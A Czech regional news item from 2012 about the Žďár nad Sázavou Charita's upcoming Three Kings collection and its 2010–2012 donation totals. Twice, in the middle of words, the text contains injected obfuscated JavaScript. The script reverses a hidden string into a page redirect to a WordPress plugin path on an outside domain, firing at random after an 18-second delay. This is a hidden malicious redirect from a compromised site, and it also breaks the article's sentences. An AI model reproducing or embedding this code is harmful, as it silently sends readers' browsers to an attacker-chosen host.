Žďár nad Sázavou, zdar nad sazavou, aktuality, Tři králové, charita
Rainbow page separator

Tříkrálová sbírka bude i v příštím roce

Sobota, 8. prosince 2012

Žďár nad Sázavou / Další ročník Tříkrálové sbírky připravuje Oblastní charita Žďár nad Sázavou. „Přípravy na akci takového rozsahu si vyžadují několikaměsíční pozornost. Pracuje se na propagačních materiálech, dárcích pro koledníky, hledáme možnosti, jak drobnými činy podpořit tradici, žádáme o pomoc asistenty sbírky a podobně,“ uvedla koordiná["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torka Tříkrálové sbírky Michaela Mahlová.

Další ročník charitativní akce bude podle jejích slov pro Žďársko výjimečný. „Malí i větší koledníci se mohou těšit na dárek v podobě ilustrace Třech králů od nové patronky Tříkrálové sbírky Oblastní charity Žďár nad Sázavou akademické malířky Kláry Trnkové, dcery Jiřího Trnky,“ vysvětlila Michaela Mahlová.

V letech 2010 až 2012 vyrazilo v lednových dnech do ulic více než čtyři a půl tisíce koledníků-dobrovolníků. Koledníci přestrojení za Tři krále s sebou nesli celkem 1047 pokladniček, do kterých byla vložena suma přesahující 6,4 milionu korun.

V roce 2010 obsahovaly pokladničky dohromady 2 032 826 korun, v roce 2011 pracovníci charity sečetli 2 167 854 korun a v roce 2012 Tři králové ve žďárském okrese od dárců získali 2 292 050 korun. Vybrané peníze pomohly k udržení a rozšíření projektů žďárské charity - mimo jiné byly použity na nákup kompenzačních pomůcek pro uživatele charitních služeb, přispěly na pořízení au["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomobilu pro Domácí hospicovou péči a Osobní asistenci a řadu dalších aktivit.